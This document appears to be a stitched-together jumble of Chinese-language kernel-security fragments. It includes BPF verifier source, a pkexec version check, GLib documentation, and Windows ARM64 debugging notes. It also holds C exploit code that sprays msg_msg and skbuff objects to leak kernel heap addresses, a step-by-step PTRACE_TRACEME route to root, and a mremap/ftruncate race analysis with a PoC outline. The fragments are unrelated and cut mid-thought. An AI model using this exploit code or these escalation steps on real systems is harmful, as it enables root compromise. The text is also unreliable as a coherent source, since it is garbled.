switch (ptr_reg->type) { case PTR_TO_MAP_VALUE_OR_NULL: verbose(env, "R%d pointer arithmetic on %s prohibited, null-check it first\n", dst, reg_type_str[ptr_reg->type]); return -EACCES; case CONST_PTR_TO_MAP: /* smin_val represents the known value */ if (known && smin_val == 0 && opcode == BPF_ADD) break; fallthrough; case PTR_TO_PACKET_END: case PTR_TO_SOCKET: case PTR_TO_SOCKET_OR_NULL: case PTR_TO_SOCK_COMMON: case PTR_TO_SOCK_COMMON_OR_NULL: case PTR_TO_TCP_SOCK: case PTR_TO_TCP_SOCK_OR_NULL: case PTR_TO_XDP_SOCK: verbose(env, "R%d pointer arithmetic on %s prohibited\n", dst, reg_type_str[ptr_reg->type]); return -EACCES; default: break; } ... }
/*
 * Type tag describing what a BPF register currently holds; the comment on
 * each enumerator states what the register contains or points to.
 *
 * Only NOT_INIT has an explicit value (0); every other enumerator is
 * numbered implicitly, so the declaration order determines the values.
 * Several pointer kinds have a matching *_OR_NULL variant for a value that
 * may still be NULL.
 */
enum bpf_reg_type {
	NOT_INIT = 0,		 /* nothing was written into register */
	SCALAR_VALUE,		 /* reg doesn't contain a valid pointer */
	PTR_TO_CTX,		 /* reg points to bpf_context */
	CONST_PTR_TO_MAP,	 /* reg points to struct bpf_map */
	PTR_TO_MAP_VALUE,	 /* reg points to map element value */
	PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
	PTR_TO_STACK,		 /* reg == frame_pointer + offset */
	PTR_TO_PACKET_META,	 /* skb->data - meta_len */
	PTR_TO_PACKET,		 /* reg points to skb->data */
	PTR_TO_PACKET_END,	 /* skb->data + headlen */
	PTR_TO_FLOW_KEYS,	 /* reg points to bpf_flow_keys */
	PTR_TO_SOCKET,		 /* reg points to struct bpf_sock */
	PTR_TO_SOCKET_OR_NULL,	 /* reg points to struct bpf_sock or NULL */
	PTR_TO_SOCK_COMMON,	 /* reg points to sock_common */
	PTR_TO_SOCK_COMMON_OR_NULL, /* reg points to sock_common or NULL */
	PTR_TO_TCP_SOCK,	 /* reg points to struct tcp_sock */
	PTR_TO_TCP_SOCK_OR_NULL, /* reg points to struct tcp_sock or NULL */
	PTR_TO_TP_BUFFER,	 /* reg points to a writable raw tp's buffer */
	PTR_TO_XDP_SOCK,	 /* reg points to struct xdp_sock */
	/* PTR_TO_BTF_ID points to a kernel struct that does not need
	 * to be null checked by the BPF program. This does not imply the
	 * pointer is _not_ null and in practice this can easily be a null
	 * pointer when reading pointer chains. The assumption is program
	 * context will handle null pointer dereference typically via fault
	 * handling. The verifier must keep this in mind and can make no
	 * assumptions about null or non-null when doing branch analysis.
	 * Further, when passed into helpers the helpers can not, without
	 * additional context, assume the value is non-null.
	 */
	PTR_TO_BTF_ID,
	/* PTR_TO_BTF_ID_OR_NULL points to a kernel struct that has not
	 * been checked for null. Used primarily to inform the verifier
	 * an explicit null check is required for this struct.
	 */
	PTR_TO_BTF_ID_OR_NULL,
	PTR_TO_MEM,		 /* reg points to valid memory region */
	PTR_TO_MEM_OR_NULL,	 /* reg points to valid memory region or NULL */
	PTR_TO_RDONLY_BUF,	 /* reg points to a readonly buffer */
	PTR_TO_RDONLY_BUF_OR_NULL, /* reg points to a readonly buffer or NULL */
	PTR_TO_RDWR_BUF,	 /* reg points to a read/write buffer */
	PTR_TO_RDWR_BUF_OR_NULL, /* reg points to a read/write buffer or NULL */
	PTR_TO_PERCPU_BTF_ID,	 /* reg points to a percpu kernel variable */
};
/* In case of 'scalar += pointer', dst_reg inherits pointer type and id. * The id may be overwritten later if we create a new variable offset. */ dst_reg->type = ptr_reg->type; dst_reg->id = ptr_reg->id; ... }
/*
 * check_cond_jmp_op - excerpt of the verifier's conditional-jump check.
 * @env:      verifier environment
 * @insn:     the jump instruction being checked
 * @insn_idx: in/out instruction index (not used in the visible part)
 *
 * Only the NULL-check detection is shown here; the code before and after it
 * is elided in this excerpt, so is_jmp32, opcode, dst_reg, this_branch and
 * other_branch are set up by code that is not visible.
 */
static int check_cond_jmp_op(struct bpf_verifier_env *env,
			     struct bpf_insn *insn, int *insn_idx)
{
	...	/* elided in this excerpt */

	/* detect if R == 0 where R is returned from bpf_map_lookup_elem().
	 * NOTE: these optimizations below are related with pointer comparison
	 * which will never be JMP32.
	 */
	if (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&
	    insn->imm == 0 && (opcode == BPF_JEQ || opcode == BPF_JNE) &&
	    reg_type_may_be_null(dst_reg->type)) {
		/* Mark all identical registers in each branch as either
		 * safe or unknown depending R == 0 or R != 0 conditional.
		 *
		 * The two calls pass complementary flags: exactly one of
		 * (opcode == BPF_JNE) and (opcode == BPF_JEQ) is true here.
		 * NOTE(review): the flag presumably means "register is NULL
		 * on this branch" - confirm against mark_ptr_or_null_regs().
		 */
		mark_ptr_or_null_regs(this_branch, insn->dst_reg,
				      opcode == BPF_JNE);
		mark_ptr_or_null_regs(other_branch, insn->dst_reg,
				      opcode == BPF_JEQ);
	}

	...	/* elided in this excerpt */
}
➜ uname -a Linux ubuntu 5.11.0-46-generic #51~20.04.1-Ubuntu SMP Fri Jan 7 06:51:40 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ~ ➜ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.3 LTS Release: 20.04 Codename: focal ➜ gcc --version gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0 Copyright (C) 2019 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ➜ pkexec --version pkexec version 0.105
g_find_program_in_path() 在用户路径中定位第一个名为 program 的可执行程序,与 execvp() 定位它的方式相同。返回具有绝对路径名的已分配字符串,如果在路径中找不到程序,则返回 NULL。如果 program 已经是绝对路径,且如果 program 存在并且可执行,则返回 program 的副本,否则返回 NULL。
1 2 3 4
gchar* g_find_program_in_path ( const gchar* program )
printf("[*] Creating holes in primary messages...\n"); for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) { if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0) goto err_rmid; }
// Use the fake secondary message to read out-of-bounds. printf("[*] Leaking adjacent secondary message...\n"); if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0) goto err_rmid;
// Check if the leak is valid. if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) { printf("[-] Error could not leak adjacent secondary message.\n"); goto err_rmid; }
// The secondary message contains a pointer to the primary message. msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE]; kheap_addr = msg->m_list_next; if (kheap_addr & (PRIMARY_SIZE - 1)) kheap_addr = msg->m_list_prev; printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
// Put kheap_addr at next to leak its content. Assumes zero bytes before // kheap_addr. printf("[*] Spraying fake secondary messages...\n"); memset(secondary_buf, 0, sizeof(secondary_buf)); build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE); if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0) goto err_rmid;
// Use the fake secondary message to read from kheap_addr. printf("[*] Leaking primary message...\n"); if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0) goto err_rmid;
// Check if the leak is valid. if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) { printf("[-] Error could not leak primary message.\n"); goto err_rmid; }
// The primary message contains a pointer to the secondary message. msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE]; kheap_addr = msg->m_list_next; if (kheap_addr & (SECONDARY_SIZE - 1)) kheap_addr = msg->m_list_prev;
// Calculate the address of the fake secondary message. kheap_addr -= SECONDARY_SIZE; printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; unsigned long private; };
/*
 * Table of callbacks attached to a pipe buffer. Only the release() member
 * is shown; the other members are elided in this excerpt.
 */
struct pipe_buf_operations {
	...	/* members elided in this excerpt */
	/*
	 * When the contents of this pipe buffer has been completely
	 * consumed by a reader, ->release() is called.
	 */
	void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
	...	/* members elided in this excerpt */
};
R0: 永远为 0
R1: ra, 返回地址
R2: tp, 线程指针
R3: sp, 栈指针
R4−R11: 参数 a0−a7, a0/a1 返回
R12−R20: t0−t8 临时寄存器
R21: reserve
R22: fp
R23−R31: s0−s8 callee
// 第一个问题,是 cred 的 rcu reference 问题 When called for PTRACE_TRACEME, ptrace_link() would obtain an RCU reference to the parent's objective credentials, then give that pointer to get_cred(). However, the object lifetime rules for things like struct cred do not permit unconditionally turning an RCU reference into a stable reference. // 第二个问题,tracee 记录的 tracer 的 cred 的问题 PTRACE_TRACEME records the parent's credentials as if the parent was acting as the subject, but that's not the case. If a malicious unprivileged child uses PTRACE_TRACEME and the parent is privileged, and at a later point, the parent process becomes attacker-controlled (because it drops privileges and calls execve()), the attacker ends up with control over two processes with a privileged ptrace relationship, which can be abused to ptrace a suid binary and obtain root privileges. Fix both of these by always recording the credentials of the process that is requesting the creation of the ptrace relationship: current_cred() can't change under us, and current is the proper subject for access control.
- 1, task A: fork()s a child, task B - 2, task B: fork()s a child, task C - 3, task B: execve(/some/special/suid/binary) - 4, task C: PTRACE_TRACEME (creates privileged ptrace relationship) - 5, task C: execve(/usr/bin/passwd) - 6, task B: drop privileges (setresuid(getuid(), getuid(), getuid())) - 7, task B: become dumpable again (e.g. execve(/some/other/binary)) - 8, task A: PTRACE_ATTACH to task B - 9, task A: use ptrace to take control of task B - 10, task B: use ptrace to take control of task C
如上场景有 3 个进程 A, B, C
第 4 步, task C 使用 PTRACE_TRACEME 建立跟 B 的 trace link 时, 由于 B 此时是 euid = 0 (因为它刚刚执行了 suid binary), 所以 C 记录的 ptracer_cred 的 euid 也是 0
第 5 步, task C 随后执行 execve(suid binary), 根据我们上面的分析,由于 C 的 ptracer_cred 是特权的, 所以 ptracer_capable 函数检测通过,所以执行完 execve 后, task C 的 euid 也提权成 0 , 注意此时 B 和 C 的 trace link 还是有效的
第 6 步, task B 执行 setresuid 将自己降权, 这个降权的目的是为了能让 task A attach
第 8 步, task A 使用 PTRACE_ATTACH 建立跟 B 的 trace link, A 和 B 都是普通权限, 之后 A 可以控制 B 执行任何操作
第 10 步, task B 控制 task C 执行提权操作
前面 9 步,依据之前的代码分析都是成立的,那么第 10 步能不能成立呢?
执行第 10 步时, task B 本身是普通权限, task C 的 euid 是 root 权限, B 和 C 的 trace link 有效, 这种条件下 B 能不能发送 ptrace request 让 C 执行各种操作,包括提权操作?
根据之前我们分析的结果, task C 此时保存的 ptracer_cred 是特权 cred, 所以这时候 ptracer_capable 会通过, 也就是说我们回答了刚刚的问题, 这种情况下,普通权限的 task B 是可以发送 ptrace request 去读写 root 权限的 task C 的内存区和代码区的
至此,task C 记录的这个特权 ptracer_cred 实际上发挥了 2 种作用
1,可以让 task C 执行 execve(suid binary) 给自己提权
2,可以让普通权限的 task B 执行 ptrace 读写 task C 的代码区和内存区,从而控制 task C 执行任意操作
上面 2 点合起来,不就是完整的提权操作吗?
小结
我们仔细回顾上述代码分析过程, 才终于明白补丁描述写的这段话
1 2 3 4 5 6 7
PTRACE_TRACEME records the parent's credentials as if the parent was acting as the subject, but that's not the case. If a malicious unprivileged child uses PTRACE_TRACEME and the parent is privileged, and at a later point, the parent process becomes attacker-controlled (because it drops privileges and calls execve()), the attacker ends up with control over two processes with a privileged ptrace relationship, which can be abused to ptrace a suid binary and obtain root privileges.
这两个系统调用表面上看八竿子打不着, 但在 Linux 内核的实现里, 它们的调用链条会出现一个竞态条件异常
1 2 3 4 5 6 7 8 9 10
1) sys_mremap() -> mremap_to()->move_vma()->move_page_tables(). move_page_tables() first calls move_ptes() in a loop, then performs a TLB flush with flush_tlb_range().
2) sys_ftruncate()->do_sys_ftruncate()->do_truncate()->notify_change() ->shmem_setattr()->unmap_mapping_range()->unmap_mapping_range_tree() ->unmap_mapping_range_vma() ->zap_page_range_single()->unmap_single_vma() ->unmap_page_range()->zap_pud_range()->zap_pmd_range()->zap_pte_range() can concurrently access the page tables of a process that is in move_page_tables(), between the move_ptes() loop and the TLB flush.
1) A 映射一个文件 a 到地址 X, 映射条件为: PROT_READ , MAP_SHARED
2) C 循环读取 X 的内容
3) A 调用 mremap 重新映射 X 到 Y, 这个调用会执行下面两个函数:
3.1) move_ptes , 该函数做如下操作:
3.1.1) 获取 X 页表和 Y 页表的锁
3.1.2) 遍历 X 对应页表的 pte , 释放之, 并在 Y 页表重建这些 pte
3.1.3) 释放 Y 页表的锁
3.1.4) 释放 X 页表的锁
3.2) flush_tlb_range : 刷新 X 对应的 TLB 缓存
4) B 调用 ftruncate 将文件 a 的文件大小改为 0, 这个调用会执行下面操作:
4.1) 获取 Y 页表的锁
4.2) 删除 Y 对应的页表
4.3) 释放 Y 对应的 pages
4.4) 刷新 Y 对应的 TLB 缓存
1 2 3 4 5 6
说明:
实际上 X 和 Y 是两块内存区域, 也就是说可能比一个 pmd 所容纳的地址范围大, 不管是 mremap 还是 ftruncate, 底层实现会将 X 和 Y 按照 pmd 为单位循环执行上表的操作, 即上表所说的 X 页表实际指的是 X 内存区域里的某个 pmd, 这里是为了表达方便简化处理, 下面的描述也是一样.
这里存在的竞态条件是: 当 4.3 已经执行完毕时 (3.1.3 释放 Y 锁之后 4.1 就可以执行), 地址 Y 的内存已经释放, 物理页面已经返回给伙伴系统, 并再一次分配给新的虚拟内存, 而此时 3.2 还没有执行. 这种情况下, 虽然 X 的映射关系在页表里已经被清空, 但在 TLB 缓存里没有被清空, 线程 C 依然可以访问 X 的内存, 造成地址复用
在版本高于 4.9 的 Linux 内核中, 带 Dirty 标记的页面会在 move_ptes 函数内部刷新 TLB, 而不是等到 3.2 由 flush_tlb_range 函数去刷新, 因此, race 发生之后, 线程 C 能通过 X 访问到的内存都是之前 non-Dirty 的页面, 即被写过的页面都无法复用.
这点改变会对 poc 和 exploit 造成什么影响? 留给大家思考.
简单版的 poc
根据上述分析, 一个简单的 poc 思路就出来了, 通过不断检测线程 C 从地址 X 读取的内容是不是初始内容就可以判断 race 是否被触发, 正常情况下, C 读取 X 只会有两种结果, 一种是 mremap 彻底完成, 即 3.2 执行完毕, 此时地址 X 为无效地址, C 的读操作引发进程崩溃退出, 第二种是 mremap 还未完成, C 读取的地址返回的是 X 的初始内容, 只有这两种情况才符合 mremap 函数的定义. 但是由于漏洞的存在, 实际运行会存在第三种情况, 即 C 读取 X 不会崩溃(3.2 还没执行, 地址映射还有效), 但内容变了( 4.3 执行完毕, 物理页面已经被其他地方复用)
对照qemu的源码可知,qemu为aarch64模拟器环境提供了串口设备PL011。我们研究了Linaro UEFI的源码EDK2并编译了对应的UEFI文件,确保使用的UEFI文件确实提供了串口功能。再用与Win10ARM64模拟器同样的配置安装了Ubuntu for ARM,在这个模拟器里PL011串口通信正常,串口采用MMIO,其映射的基址为0x09000000。但安装Win10后问题依旧:以基于串口的远程内核调试的启动配置来启动Win10RS4ARM64,系统加载的是kd.dll而非期望的kdcom.dll,故而推测是winload 没有识别PL011串口设备、没能去加载kdcom.dll。由此,我们决定直接将kdcom.dll替换kd.dll来使用。不过使用kdcom.dll替换kd.dll后出现了新的问题——系统引导异常,下面进一步分析其原因。